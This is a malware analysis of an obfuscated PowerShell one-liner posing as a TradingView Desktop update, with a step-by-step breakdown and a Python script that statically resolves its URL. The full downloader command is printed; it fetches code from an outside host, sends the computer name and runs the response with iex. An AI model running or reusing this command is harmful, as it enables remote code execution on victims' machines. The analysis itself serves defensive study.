This PowerShell one-liner appears to be a malicious downloader: it fetches content from a remote URL and executes it on the system. Here is a breakdown of its functionality:
1. The script sets multiple variables, most of them string fragments that are concatenated into the URL held in `$dev`, with the computer name appended as the `compName` query parameter:
   - `$launch='launch'`
   - `$update='update'`
   - `$TWDesktop='dlr'+'.com'`
   - `$flow='flow'`
   - `$ai='htt'`
   - `$model='ps://ea'`
   - `$dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername`
2. It sets the security protocol to TLS 1.2 (PowerShell is case-insensitive, so the mixed casing does not change the behavior):
   - `[nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12`
3. It then makes a web request to the URL stored in the `$dev` variable using `iwr` (Invoke-WebRequest) and stores the response in `$done`:
   - `$done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'`
4. It creates a message box using `WScript.Shell` with the message "TradingView Desktop updated!":
   - `$command=New-Object -ComObject Wscript.Shell`
   - `$status='TradingView Desktop '+$update+'d!'`
   - `$command.Popup($status,180,'Success',0x0)`
5. Finally, it executes the result of the web request with `iex` (Invoke-Expression):
   - `iex $done;`
This script is attempting to reach a potentially malicious URL, fetch the content, and execute it on the system. The use of `Invoke-Expression` (`iex`) with the result of a web request is a common technique used by attackers to download and run malicious code on the victim's system. It is strongly advised not to run this script as it poses a security risk to the system.
```powershell
powershell -c "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; $dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; [nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'; $command=New-Object -ComObject Wscript.Shell; $status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"
```
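The breakdown above can be confirmed statically, without running the sample. The Python code below is an added example, not part of the original page: it treats the one-liner as inert text, folds the string fragments into the final URL, and reports when a web response is passed to `iex`. The function names (`statements`, `resolve`, `analyze`) are hypothetical, and `$env:` values are left as `<NAME>` placeholders.

```python
import re
# Inner command of the one-liner on this page, held as inert text (never executed).
SAMPLE = (
    "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; "
    "$dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; "
    "[nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing "
    "-UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 "
    "Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'; $command=New-Object -ComObject Wscript.Shell; "
    "$status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"
)

TERM = r"'[^']*'|\$env:\w+|\$\w+"          # literal, environment variable, variable
CONCAT = re.compile(rf"(?:{TERM})(?:\s*\+\s*(?:{TERM}))*", re.I)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*(.+)", re.S)
FETCH = re.compile(r"(?:iwr|invoke-webrequest)\s+\$(\w+)", re.I)
EXEC = re.compile(r"(?:iex|invoke-expression)\s+\$(\w+)", re.I)

def statements(script):  # split on ';' but not inside quotes (the User-Agent has ';')
    return [s.strip() for s in re.findall(r"(?:'[^']*'|[^;'])+", script) if s.strip()]

def resolve(expr, variables):
    """Fold a '+' chain of literals and known variables; None if it cannot be folded."""
    if not CONCAT.fullmatch(expr):
        return None
    parts = []
    for term in re.findall(TERM, expr, re.I):
        key = term[1:].lower()             # PowerShell variable names are case-insensitive
        if term.startswith("'"):
            parts.append(term[1:-1])
        elif key.startswith("env:"):
            parts.append(f"<{key[4:].upper()}>")   # host-specific, kept symbolic
        else:
            parts.append(variables.get(key))       # None when the variable is unknown
    return None if None in parts else "".join(parts)

def analyze(script):
    """Return (folded variables, URLs whose response is later passed to iex)."""
    variables, fetched, executed = {}, {}, []
    for stmt in statements(script):
        assign = ASSIGN.fullmatch(stmt)
        if assign:
            name, rhs = assign.group(1).lower(), assign.group(2)
            if fetch := FETCH.match(rhs):
                fetched[name] = variables.get(fetch.group(1).lower())
            elif (value := resolve(rhs, variables)) is not None:
                variables[name] = value
        elif (run := EXEC.fullmatch(stmt)) and run.group(1).lower() in fetched:
            executed.append(fetched[run.group(1).lower()])
    return variables, executed
```

`analyze(SAMPLE)` returns the folded variables, including `dev` and `status`, together with the list of URLs whose response reaches `iex`.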